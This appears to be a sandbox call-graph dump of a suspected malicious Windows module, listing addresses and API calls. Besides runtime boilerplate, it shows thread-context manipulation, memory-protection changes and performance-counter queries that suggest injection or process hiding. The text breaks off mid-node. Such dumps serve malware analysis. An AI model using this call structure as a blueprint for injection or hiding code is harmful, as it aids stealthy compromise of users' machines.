202c0ae1dd4 2 API calls 8820->8821 8821->8820 9241 202c0aef6dc 9242 202c0aef6e8 9241->9242 9244 202c0aef70f 9242->9244 9245 202c0af1c0c 9242->9245 9246 202c0af1c11 9245->9246 9247 202c0af1c4c 9245->9247 9248 202c0af1c44 9246->9248 9249 202c0af1c32 DeleteCriticalSection 9246->9249 9247->9242 9250 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9248->9250 9249->9248 9249->9249 9250->9247 9251 202c0ae2ed8 9252 202c0ae2f35 9251->9252 9253 202c0ae2f50 9252->9253 9254 202c0ae38a8 3 API calls 9252->9254 9254->9253 7968 202c0aed658 7969 202c0aed67d 7968->7969 7974 202c0aed694 7968->7974 7970 202c0aed1f4 __std_exception_copy 13 API calls 7969->7970 7971 202c0aed682 7970->7971 7973 202c0aed04c _invalid_parameter_noinfo 38 API calls 7971->7973 7972 202c0aed724 8100 202c0aebb54 7972->8100 7975 202c0aed68d 7973->7975 7974->7972 7983 202c0aed7b6 7974->7983 7985 202c0aed6da 7974->7985 8001 202c0aed894 7974->8001 8063 202c0aeda18 7974->8063 7980 202c0aed784 7982 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7980->7982 7981 202c0aed836 7984 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7981->7984 7986 202c0aed78b 7982->7986 7987 202c0aed6fd 7983->7987 7993 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7983->7993 7988 202c0aed841 7984->7988 7985->7987 7994 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7985->7994 7986->7987 7990 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7986->7990 7991 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7987->7991 7992 202c0aed85a 7988->7992 7996 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7988->7996 7989 202c0aed7d7 7989->7981 7989->7989 7998 202c0aed87c 7989->7998 8106 202c0af0eb8 7989->8106 7990->7986 7991->7975 7997 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7992->7997 7993->7983 7994->7985 7996->7988 7997->7975 7999 202c0aed06c _invalid_parameter_noinfo 17 API calls 7998->7999 8000 202c0aed891 7999->8000 8002 202c0aed8c2 8001->8002 8002->8002 8003 202c0aed8de 8002->8003 8004 202c0aed220 _invalid_parameter_noinfo 13 API calls 8002->8004 8003->7974 8005 202c0aed90d 8004->8005 8006 202c0aed926 8005->8006 8007 202c0af0eb8 38 API calls 8005->8007 8008 202c0af0eb8 38 API calls 8006->8008 8018 202c0aed9fc 8006->8018 8007->8006 8009 202c0aed943 8008->8009 8011 202c0aed962 8009->8011 8012 202c0aed97f 8009->8012 8016 202c0aed98d 8009->8016 8009->8018 8010 202c0aed06c _invalid_parameter_noinfo 17 API calls 8023 202c0aeda17 8010->8023 8013 202c0aed220 _invalid_parameter_noinfo 13 API calls 8011->8013 8014 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8012->8014 8017 202c0aed96d 8013->8017 8014->8018 8015 202c0aed977 8015->8012 8021 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8015->8021 8016->8015 8115 202c0aeeee0 8016->8115 8022 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8017->8022 8018->8010 8019 202c0aeda7a 8028 202c0aeda8c 8019->8028 8033 202c0aedaa1 _invalid_parameter_noinfo 8019->8033 8021->8012 8022->8015 8023->8019 8124 202c0af13d8 8023->8124 8024 202c0aed9b5 8026 202c0aed9d0 8024->8026 8027 202c0aed9ba 8024->8027 8029 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8026->8029 8030 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8027->8030 8031 202c0aed894 52 API calls 8028->8031 8029->8012 8030->8015 8032 202c0aeda9c 8031->8032 8035 202c0ae8070 _invalid_parameter_noinfo 8 API calls 8032->8035 8133 202c0aedd78 8033->8133 8036 202c0aedd64 8035->8036 8036->7974 8038 202c0aedb1a 8145 202c0aed30c 8038->8145 8042 202c0aedba8 8043 202c0aed894 52 API calls 8042->8043 8045 202c0aedbb8 8043->8045 8044 202c0aedd78 14 API calls 8051 202c0aedbd2 8044->8051 8045->8032 8046 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8045->8046 8046->8032 8047 202c0aef198 9 API calls 8047->8051 8049 202c0aed894 52 API calls 8049->8051 8050 202c0aedcc8 FindNextFileW 8050->8051 8052 202c0aedce0 8050->8052 8051->8044 8051->8047 8051->8049 8051->8050 8053 202c0aed2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 8051->8053 8054 202c0aedd2a 8051->8054 8167 202c0aed4ac 8051->8167 8055 202c0aedd0c FindClose 8052->8055 8189 202c0af0b20 8052->8189 8053->8051 8056 202c0aedd38 FindClose 8054->8056 8059 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8054->8059 8055->8032 8058 202c0aedd1c 8055->8058 8056->8032 8060 202c0aedd48 8056->8060 8061 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8058->8061 8059->8056 8062 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8060->8062 8061->8032 8062->8032 8064 202c0aeda58 8063->8064 8065 202c0aeda7a 8063->8065 8064->8065 8066 202c0af13d8 38 API calls 8064->8066 8067 202c0aeda8c 8065->8067 8070 202c0aedaa1 _invalid_parameter_noinfo 8065->8070 8066->8064 8068 202c0aed894 56 API calls 8067->8068 8069 202c0aeda9c 8068->8069 8072 202c0ae8070 _invalid_parameter_noinfo 8 API calls 8069->8072 8071 202c0aedd78 14 API calls 8070->8071 8074 202c0aedb0b 8071->8074 8073 202c0aedd64 8072->8073 8073->7974 8075 202c0aedb1a 8074->8075 8076 202c0aef198 9 API calls 8074->8076 8077 202c0aed30c 16 API calls 8075->8077 8076->8075 8078 202c0aedb7b FindFirstFileExW 8077->8078 8079 202c0aedba8 8078->8079 8088 202c0aedbd2 8078->8088 8080 202c0aed894 56 API calls 8079->8080 8082 202c0aedbb8 8080->8082 8081 202c0aedd78 14 API calls 8081->8088 8082->8069 8083 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8082->8083 8083->8069 8084 202c0aef198 9 API calls 8084->8088 8085 202c0aed4ac 16 API calls 8085->8088 8086 202c0aed894 56 API calls 8086->8088 8087 202c0aedcc8 FindNextFileW 8087->8088 8089 202c0aedce0 8087->8089 8088->8081 8088->8084 8088->8085 8088->8086 8088->8087 8090 202c0aed2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 8088->8090 8091 202c0aedd2a 8088->8091 8092 202c0aedd0c FindClose 8089->8092 8094 202c0af0b20 38 API calls 8089->8094 8090->8088 8093 202c0aedd38 FindClose 8091->8093 8096 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8091->8096 8092->8069 8095 202c0aedd1c 8092->8095 8093->8069 8097 202c0aedd48 8093->8097 8094->8092 8098 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8095->8098 8096->8093 8099 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8097->8099 8098->8069 8099->8069 8101 202c0aebb6c 8100->8101 8102 202c0aebba4 8100->8102 8101->8102 8103 202c0aed220 _invalid_parameter_noinfo 13 API calls 8101->8103 8102->7980 8102->7989 8104 202c0aebb9a 8103->8104 8105 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8104->8105 8105->8102 8110 202c0af0ed5 8106->8110 8107 202c0af0eda 8108 202c0af0ef0 8107->8108 8109 202c0aed1f4 __std_exception_copy 13 API calls 8107->8109 8108->7989 8111 202c0af0ee4 8109->8111 8110->8107 8110->8108 8113 202c0af0f24 8110->8113 8112 202c0aed04c _invalid_parameter_noinfo 38 API calls 8111->8112 8112->8108 8113->8108 8114 202c0aed1f4 __std_exception_copy 13 API calls 8113->8114 8114->8111 8116 202c0aeef1f 8115->8116 8117 202c0aeef02 8115->8117 8121 202c0aeef29 8116->8121 8197 202c0af19f0 8116->8197 8117->8116 8118 202c0aeef10 8117->8118 8119 202c0aed1f4 __std_exception_copy 13 API calls 8118->8119 8123 202c0aeef15 _invalid_parameter_noinfo 8119->8123 8204 202c0af1a40 8121->8204 8123->8024 8125 202c0af13e0 8124->8125 8126 202c0af13f5 8125->8126 8127 202c0af140e 8125->8127 8128 202c0aed1f4 __std_exception_copy 13 API calls 8126->8128 8130 202c0aedd78 14 API calls 8127->8130 8132 202c0af1405 8127->8132 8129 202c0af13fa 8128->8129 8131 202c0aed04c _invalid_parameter_noinfo 38 API calls 8129->8131 8130->8132 8131->8132 8132->8023 8134 202c0aedd9c 8133->8134 8140 202c0aedb0b 8133->8140 8135 202c0aecab0 _invalid_parameter_noinfo 14 API calls 8134->8135 8134->8140 8136 202c0aeddb7 8135->8136 8223 202c0aeffb4 8136->8223 8140->8038 8141 202c0aef198 8140->8141 8142 202c0aef1a9 8141->8142 8143 202c0aef1ca 8141->8143 8142->8143 8231 202c0aeef88 8142->8231 8143->8038 8146 202c0aed35a 8145->8146 8147 202c0aed336 8145->8147 8148 202c0aed3bf 8146->8148 8149 202c0aed35f 8146->8149 8150 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8147->8150 8155 202c0aed345 FindFirstFileExW 8147->8155 8250 202c0aeec58 8148->8250 8152 202c0aed374 8149->8152 8149->8155 8156 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8149->8156 8150->8155 8153 202c0aec5d0 14 API calls 8152->8153 8153->8155 8155->8042 8155->8051 8156->8152 8168 202c0aed4fa 8167->8168 8169 202c0aed4d6 8167->8169 8170 202c0aed55f 8168->8170 8173 202c0aed500 8168->8173 8171 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8169->8171 8180 202c0aed4e5 8169->8180 8253 202c0aeece8 8170->8253 8171->8180 8174 202c0aed515 8173->8174 8177 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8173->8177 8173->8180 8175 202c0aec5d0 14 API calls 8174->8175 8175->8180 8177->8174 8180->8051 8190 202c0af0b52 8189->8190 8191 202c0aed1f4 __std_exception_copy 13 API calls 8190->8191 8196 202c0af0b67 _invalid_parameter_noinfo 8190->8196 8192 202c0af0b5c 8191->8192 8193 202c0aed04c _invalid_parameter_noinfo 38 API calls 8192->8193 8193->8196 8194 202c0ae8070 _invalid_parameter_noinfo 8 API calls 8195 202c0af0ea8 8194->8195 8195->8055 8196->8194 8198 202c0af19f9 8197->8198 8199 202c0af1a12 HeapSize 8197->8199 8200 202c0aed1f4 __std_exception_copy 13 API calls 8198->8200 8201 202c0af19fe 8200->8201 8202 202c0aed04c _invalid_parameter_noinfo 38 API calls 8201->8202 8203 202c0af1a09 8202->8203 8203->8121 8205 202c0af1a5f 8204->8205 8206 202c0af1a55 8204->8206 8208 202c0af1a64 8205->8208 8214 202c0af1a6b _invalid_parameter_noinfo 8205->8214 8216 202c0aec5d0 8206->8216 8209 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8208->8209 8213 202c0af1a5d 8209->8213 8210 202c0af1a71 8212 202c0aed1f4 __std_exception_copy 13 API calls 8210->8212 8211 202c0af1a9e HeapReAlloc 8211->8213 8211->8214 8212->8213 8213->8123 8214->8210 8214->8211 8215 202c0aeb470 _invalid_parameter_noinfo 2 API calls 8214->8215 8215->8214 8217 202c0aec61b 8216->8217 8222 202c0aec5df _invalid_parameter_noinfo 8216->8222 8218 202c0aed1f4 __std_exception_copy 13 API calls 8217->8218 8220 202c0aec619 8218->8220 8219 202c0aec602 HeapAlloc 8219->8220 8219->8222 8220->8213 8221 202c0aeb470 _invalid_parameter_noinfo 2 API calls 8221->8222 8222->8217 8222->8219 8222->8221 8224 202c0aeffc9 8223->8224 8226 202c0aeddda 8223->8226 8225 202c0af0a40 _invalid_parameter_noinfo 14 API calls 8224->8225 8224->8226 8225->8226 8227 202c0af0020 8226->8227 8228 202c0af0048 8227->8228 8229 202c0af0035 8227->8229 8228->8140 8229->8228 8230 202c0aee8c4 _invalid_parameter_noinfo 14 API calls 8229->8230 8230->8228 8232 202c0aef078 8231->8232 8245 202c0aeefbd __vcrt_FlsAlloc 8231->8245 8249 202c0aec558 EnterCriticalSection 8232->8249 8234 202c0aeefe2 LoadLibraryExW 8237 202c0aef107 8234->8237 8238 202c0aef007 GetLastError 8234->8238 8236 202c0aef120 GetProcAddress 8236->8232 8237->8236 8240 202c0aef117 FreeLibrary 8237->8240 8238->8245 8240->8236 8245->8232 8245->8234 8245->8236 8247 202c0aef041 LoadLibraryExW 8245->8247 8247->8237 8247->8245 8252 202c0aeec61 MultiByteToWideChar 8250->8252 8255 202c0aeed0c WideCharToMultiByte 8253->8255 8822 202c0aec1d8 8823 202c0aec1f1 8822->8823 8824 202c0aec209 8822->8824 8823->8824 8825 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8823->8825 8825->8824 8256 202c0ae2e54 8258 202c0ae2ea8 8256->8258 8257 202c0ae2ec3 8258->8257 8260 202c0ae37f4 8258->8260 8261 202c0ae388a 8260->8261 8264 202c0ae3819 8260->8264 8261->8257 8262 202c0ae3f88 StrCmpNIW 8262->8264 8263 202c0ae1e08 StrCmpIW StrCmpW 8263->8264 8264->8261 8264->8262 8264->8263 9255 202c0aeb0d4 9262 202c0aeb007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9255->9262 9256 202c0aeb0fb 9257 202c0ae9324 _CallSETranslator 9 API calls 9256->9257 9258 202c0aeb100 9257->9258 9259 202c0ae9324 _CallSETranslator 9 API calls 9258->9259 9260 202c0aeb10b __FrameHandler3::GetHandlerSearchState 9258->9260 9259->9260 9261 202c0ae99cc 9 API calls Is_bad_exception_allowed 9261->9262 9262->9256 9262->9260 9262->9261 9263 202c0ae99f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9262->9263 9263->9262 8826 202c0ae6430 8827 202c0ae643d 8826->8827 8828 202c0ae6449 8827->8828 8830 202c0ae655a 8827->8830 8829 202c0ae64cd 8828->8829 8831 202c0ae64a6 SetThreadContext 8828->8831 8832 202c0ae6581 VirtualProtect FlushInstructionCache 8830->8832 8833 202c0ae663e 8830->8833 8831->8829 8832->8830 8834 202c0ae665e 8833->8834 8836 202c0ae4b20 VirtualFree 8833->8836 8835 202c0ae5530 3 API calls 8834->8835 8839 202c0ae6663 8835->8839 8836->8834 8837 202c0ae66b7 8840 202c0ae8070 _invalid_parameter_noinfo 8 API calls 8837->8840 8838 202c0ae6677 ResumeThread 8838->8839 8839->8837 8839->8838 8841 202c0ae66ff 8840->8841 8842 202c0aeec30 GetCommandLineA GetCommandLineW 8265 202c0aeaaac 8266 202c0aeaad9 __except_validate_context_record 8265->8266 8267 202c0ae9324 _CallSETranslator 9 API calls 8266->8267 8268 202c0aeaade 8267->8268 8270 202c0aeab38 8268->8270 8272 202c0aeabc6 8268->8272 8279 202c0aeab8c 8268->8279 8269 202c0aeac34 8269->8279 8307 202c0aea22c 8269->8307 8271 202c0aeabb3 8270->8271 8270->8279 8280 202c0aeab5a __GetCurrentState 8270->8280 8294 202c0ae95d0 8271->8294 8276 202c0aeabe5 8272->8276 8301 202c0ae99cc 8272->8301 8276->8269 8276->8279 8304 202c0ae99e0 8276->8304 8278 202c0aeacdd 8280->8278 8282 202c0aeafb8 8280->8282 8283 202c0ae99cc Is_bad_exception_allowed 9 API calls 8282->8283 8284 202c0aeafe7 __GetCurrentState 8283->8284 8285 202c0ae9324 _CallSETranslator 9 API calls 8284->8285 8291 202c0aeb004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8285->8291 8286 202c0aeb0fb 8287 202c0ae9324 _CallSETranslator 9 API calls 8286->8287 8288 202c0aeb100 8287->8288 8289 202c0ae9324 _CallSETranslator 9 API calls 8288->8289 8290 202c0aeb10b __FrameHandler3::GetHandlerSearchState 8288->8290 8289->8290 8290->8279 8291->8286 8291->8290 8292 202c0ae99cc 9 API calls Is_bad_exception_allowed 8291->8292 8364 202c0ae99f4 8291->8364 8292->8291 8367 202c0ae9634 8294->8367 8296 202c0ae95ef __FrameHandler3::GetHandlerSearchState 8371 202c0ae9540 8296->8371 8299 202c0aeafb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8300 202c0ae9624 8299->8300 8300->8279 8302 202c0ae9324 _CallSETranslator 9 API calls 8301->8302 8303 202c0ae99d5 8302->8303 8303->8276 8305 202c0ae9324 _CallSETranslator 9 API calls 8304->8305 8306 202c0ae99e9 8305->8306 8306->8269 8375 202c0aeb144 8307->8375 8309 202c0aea6f4 8310 202c0aea645 8310->8309 8351 202c0aea643 8310->8351 8428 202c0aea6fc 8310->8428 8311 202c0aea373 8311->8310 8312 202c0aea3ab 8311->8312 8315 202c0aea575 8312->8315 8348 202c0ae99e0 9 API calls 8312->8348 8400 202c0aea96c 8312->8400 8414 202c0aea158 8312->8414 8314 202c0ae9324 _CallSETranslator 9 API calls 8318 202c0aea687 8314->8318 8321 202c0ae99cc Is_bad_exception_allowed 9 API calls 8315->8321 8324 202c0aea592 8315->8324 8315->8351 8316 202c0ae9324 _CallSETranslator 9 API calls 8319 202c0aea2da 8316->8319 8318->8309 8320 202c0ae8070 _invalid_parameter_noinfo 8 API calls 8318->8320 8319->8318 8322 202c0ae9324 _CallSETranslator 9 API calls 8319->8322 8323 202c0aea69a 8320->8323 8321->8324 8326 202c0aea2ea 8322->8326 8323->8279 8327 202c0aea5b4 8324->8327 8324->8351 8421 202c0ae95a4 8324->8421 8328 202c0ae9324 _CallSETranslator 9 API calls 8326->8328 8329 202c0aea5ca 8327->8329 8330 202c0aea6d7 8327->8330 8327->8351 8331 202c0aea2f3 8328->8331 8332 202c0aea5d5 8329->8332 8335 202c0ae99cc Is_bad_exception_allowed 9 API calls 8329->8335 8333 202c0ae9324 _CallSETranslator 9 API calls 8330->8333 8386 202c0ae9a0c 8331->8386 8339 202c0aeb1dc 9 API calls 8332->8339 8336 202c0aea6dd 8333->8336 8335->8332 8338 202c0ae9324 _CallSETranslator 9 API calls 8336->8338 8342 202c0aea6e6 8338->8342 8340 202c0aea5eb 8339->8340 8345 202c0ae9634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 8340->8345 8340->8351 8341 202c0ae9324 _CallSETranslator 9 API calls 8343 202c0aea335 8341->8343 8344 202c0aec2f4 14 API calls 8342->8344 8343->8311 8347 202c0ae9324 _CallSETranslator 9 API calls 8343->8347 8344->8309 8346 202c0aea605 8345->8346 8425 202c0ae9838 RtlUnwindEx 8346->8425 8350 202c0aea341 8347->8350 8348->8312 8352 202c0ae9324 _CallSETranslator 9 API calls 8350->8352 8351->8314 8354 202c0aea34a 8352->8354 8389 202c0aeb1dc 8354->8389 8358 202c0aea35e 8396 202c0aeb2cc 8358->8396 8360 202c0aea6d1 8361 202c0aec2f4 14 API calls 8360->8361 8361->8330 8362 202c0aea366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 8362->8360 8440 202c0ae9178 8362->8440 8365 202c0ae9324 _CallSETranslator 9 API calls 8364->8365 8366 202c0ae9a02 8365->8366 8366->8291 8368 202c0ae9662 __FrameHandler3::GetHandlerSearchState 8367->8368 8369 202c0ae968c RtlLookupFunctionEntry 8368->8369 8370 202c0ae96d4 8368->8370 8369->8368 8370->8296 8372 202c0ae9560 8371->8372 8373 202c0ae958b 8371->8373 8372->8373 8374 202c0ae9324 _CallSETranslator 9 API calls 8372->8374 8373->8299 8374->8372 8376 202c0aeb169 __FrameHandler3::GetHandlerSearchState 8375->8376 8377 202c0ae9634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 8376->8377 8378 202c0aeb17e 8377->8378 8445 202c0ae9db4 8378->8445 8381 202c0aeb190 __FrameHandler3::GetHandlerSearchState 8448 202c0ae9dec 8381->8448 8382 202c0aeb1b3 8383 202c0ae9db4 __GetUnwindTryBlock RtlLookupFunctionEntry 8382->8383 8384 202c0aea28e 8383->8384 8384->8309 8384->8311 8384->8316 8387 202c0ae9324 _CallSETranslator 9 API calls 8386->8387 8388 202c0ae9a1a 8387->8388 8388->8309 8388->8341 8391 202c0aeb2c3 8389->8391 8394 202c0aeb207 8389->8394 8390 202c0aea35a 8390->8311 8390->8358 8392 202c0ae99e0 9 API calls 8392->8394 8393 202c0ae99cc Is_bad_exception_allowed 9 API calls 8393->8394 8394->8390 8394->8392 8394->8393 8395 202c0aea96c 9 API calls 8394->8395 8395->8394 8397 202c0aeb339 8396->8397 8399 202c0aeb2e9 Is_bad_exception_allowed 8396->8399 8397->8362 8398 202c0ae99cc 9 API calls Is_bad_exception_allowed 8398->8399 8399->8397 8399->8398 8401 202c0aeaa28 8400->8401 8402 202c0aea999 8400->8402 8401->8312 8403 202c0ae99cc Is_bad_exception_allowed 9 API calls 8402->8403 8404 202c0aea9a2 8403->8404 8404->8401 8405 202c0ae99cc Is_bad_exception_allowed 9 API calls 8404->8405 8406 202c0aea9bb 8404->8406 8405->8406 8406->8401 8407 202c0aea9e7 8406->8407 8408 202c0ae99cc Is_bad_exception_allowed 9 API calls 8406->8408 8409 202c0ae99e0 9 API calls 8407->8409 8408->8407 8410 202c0aea9fb 8409->8410 8410->8401 8411 202c0aeaa14 8410->8411 8412 202c0ae99cc Is_bad_exception_allowed 9 API calls 8410->8412 8413 202c0ae99e0 9 API calls 8411->8413 8412->8411 8413->8401 8415 202c0ae9634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 8414->8415 8416 202c0aea195 8415->8416 8417 202c0ae99cc Is_bad_exception_allowed 9 API calls 8416->8417 8418 202c0aea1cd 8417->8418 8419 202c0ae9838 9 API calls 8418->8419 8420 202c0aea211 8419->8420 8420->8312 8422 202c0ae95b8 __FrameHandler3::GetHandlerSearchState 8421->8422 8423 202c0ae9540 __FrameHandler3::ExecutionInCatch 9 API calls 8422->8423 8424 202c0ae95c2 8423->8424 8424->8327 8426 202c0ae8070 _invalid_parameter_noinfo 8 API calls 8425->8426 8427 202c0ae9932 8426->8427 8427->8351 8429 202c0aea735 8428->8429 8433 202c0aea948 8428->8433 8430 202c0ae9324 _CallSETranslator 9 API calls 8429->8430 8431 202c0aea73a 8430->8431 8432 202c0aea759 EncodePointer 8431->8432 8439 202c0aea7ac 8431->8439 8434 202c0ae9324 _CallSETranslator 9 API calls 8432->8434 8433->8351 8435 202c0aea769 8434->8435 8435->8439 8451 202c0ae94ec 8435->8451 8437 202c0ae99cc 9 API calls Is_bad_exception_allowed 8437->8439 8438 202c0aea158 19 API calls 8438->8439 8439->8433 8439->8437 8439->8438 8441 202c0ae9197 8440->8441 8442 202c0ae91c0 RtlPcToFileHeader 8441->8442 8443 202c0ae91e2 RaiseException 8441->8443 8444 202c0ae91d8 8442->8444 8443->8360 8444->8443 8446 202c0ae9634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 8445->8446 8447 202c0ae9dc7 8446->8447 8447->8381 8447->8382 8449 202c0ae9634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 8448->8449 8450 202c0ae9e06 8449->8450 8450->8384 8452 202c0ae9324 _CallSETranslator 9 API calls 8451->8452 8453 202c0ae9518 8452->8453 8453->8439 9108 202c0ae33a8 9109 202c0ae33cf 9108->9109 9110 202c0ae349c 9109->9110 9111 202c0ae33ec PdhGetCounterInfoW 9109->9111 9111->9110 9112 202c0ae340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 9111->9112 9113 202c0ae3440 StrCmpW 9112->9113 9114 202c0ae3488 GetProcessHeap HeapFree 9112->9114 9113->9114 9116 202c0ae3455 9113->9116 9114->9110 9115 202c0ae3950 12 API calls 9115->9116 9116->9114 9116->9115 8843 202c0aec828 8844 202c0aec82d 8843->8844 8845 202c0aec842 8843->8845 8849 202c0aec848 8844->8849 8850 202c0aec88a 8849->8850 8851 202c0aec892 8849->8851 8852 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8850->8852 8853 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8851->8853 8852->8851 8854 202c0aec89f 8853->8854 8855 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8854->8855 8856 202c0aec8ac 8855->8856 8857 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8856->8857 8858 202c0aec8b9 8857->8858 8859 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8858->8859 8860 202c0aec8c6 8859->8860 8861 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8860->8861 8862 202c0aec8d3 8861->8862 8863 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8862->8863 8864 202c0aec8e0 8863->8864 8865 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8864->8865 8866 202c0aec8ed 8865->8866 8867 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8866->8867 8868 202c0aec8fd 8867->8868 8869 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8868->8869 8870 202c0aec90d 8869->8870 8875 202c0aec6f8 8870->8875 8889 202c0aec558 EnterCriticalSection 8875->8889 9117 202c0af0fa8 9118 202c0af0fcc 9117->9118 9119 202c0ae8070 _invalid_parameter_noinfo 8 API calls 9118->9119 9120 202c0af100e 9119->9120 9121 202c0ae81c0 9122 202c0ae81c9 __scrt_release_startup_lock 9121->9122 9123 202c0ae81cd 9122->9123 9125 202c0aebbb4 9122->9125 9126 202c0aebbed 9125->9126 9127 202c0aebbd4 9125->9127 9126->9123 9128 202c0aebbdc 9127->9128 9129 202c0aebbf2 9127->9129 9130 202c0aed1f4 __std_exception_copy 13 API calls 9128->9130 9131 202c0aee864 56 API calls 9129->9131 9132 202c0aebbe1 9130->9132 9133 202c0aebbf7 9131->9133 9134 202c0aed04c _invalid_parameter_noinfo 38 API calls 9132->9134 9154 202c0aedf38 GetModuleFileNameW 9133->9154 9134->9126 9139 202c0aebb54 13 API calls 9140 202c0aebc61 9139->9140 9141 202c0aebc7a 9140->9141 9142 202c0aebc69 9140->9142 9144 202c0aeb994 14 API calls 9141->9144 9143 202c0aed1f4 __std_exception_copy 13 API calls 9142->9143 9153 202c0aebc6e 9143->9153 9146 202c0aebc96 9144->9146 9145 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9145->9126 9147 202c0aebcdf 9146->9147 9148 202c0aebcc6 9146->9148 9146->9153 9150 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9147->9150 9149 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9148->9149 9151 202c0aebccf 9149->9151 9150->9153 9152 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9151->9152 9152->9126 9153->9145 9155 202c0aedf91 9154->9155 9156 202c0aedf7d GetLastError 9154->9156 9157 202c0aedd78 14 API calls 9155->9157 9172 202c0aed184 9156->9172 9159 202c0aedfbf 9157->9159 9161 202c0aef198 9 API calls 9159->9161 9165 202c0aedfd0 9159->9165 9160 202c0ae8070 _invalid_parameter_noinfo 8 API calls 9162 202c0aebc0e 9160->9162 9161->9165 9166 202c0aeb994 9162->9166 9164 202c0aedf8a 9164->9160 9177 202c0aede1c 9165->9177 9168 202c0aeb9d2 9166->9168 9170 202c0aeba38 9168->9170 9194 202c0aeec1c 9168->9194 9169 202c0aebb25 9169->9139 9170->9169 9171 202c0aeec1c 14 API calls 9170->9171 9171->9170 9191 202c0aed1d0 9172->9191 9174 202c0aed191 Concurrency::details::SchedulerProxy::DeleteThis 9175 202c0aed1f4 __std_exception_copy 13 API calls 9174->9175 9176 202c0aed1a1 9175->9176 9176->9164 9178 202c0aede5b 9177->9178 9180 202c0aede40 9177->9180 9179 202c0aede60 9178->9179 9181 202c0aeece8 WideCharToMultiByte 9178->9181 9179->9180 9184 202c0aed1f4 __std_exception_copy 13 API calls 9179->9184 9180->9164 9182 202c0aedeb7 9181->9182 9182->9179 9183 202c0aedebe GetLastError 9182->9183 9186 202c0aedee9 9182->9186 9185 202c0aed184 13 API calls 9183->9185 9184->9180 9187 202c0aedecb 9185->9187 9188 202c0aeece8 WideCharToMultiByte 9186->9188 9189 202c0aed1f4 __std_exception_copy 13 API calls 9187->9189 9190 202c0aedf10 9188->9190 9189->9180 9190->9180 9190->9183 9192 202c0aecb10 __std_exception_copy 13 API calls 9191->9192 9193 202c0aed1d9 9192->9193 9193->9174 9195 202c0aeeba8 9194->9195 9196 202c0aedd78 14 API calls 9195->9196 9197 202c0aeebcc 9196->9197 9197->9168 8891 202c0aef440 GetProcessHeap 9267 202c0aeff40 9268 202c0aeff4b 9267->9268 9276 202c0af2c24 9268->9276 9289 202c0aec558 EnterCriticalSection 9276->9289 7605 202c0ae1e3c LoadLibraryA GetProcAddress 7606 202c0ae1e6f 7605->7606 7607 202c0ae1e62 SleepEx 7605->7607 7607->7607 8454 202c0ae34b8 8455 202c0ae34e8 8454->8455 8456 202c0ae35a1 8455->8456 8457 202c0ae3505 PdhGetCounterInfoW 8455->8457 8457->8456 8458 202c0ae3523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 8457->8458 8459 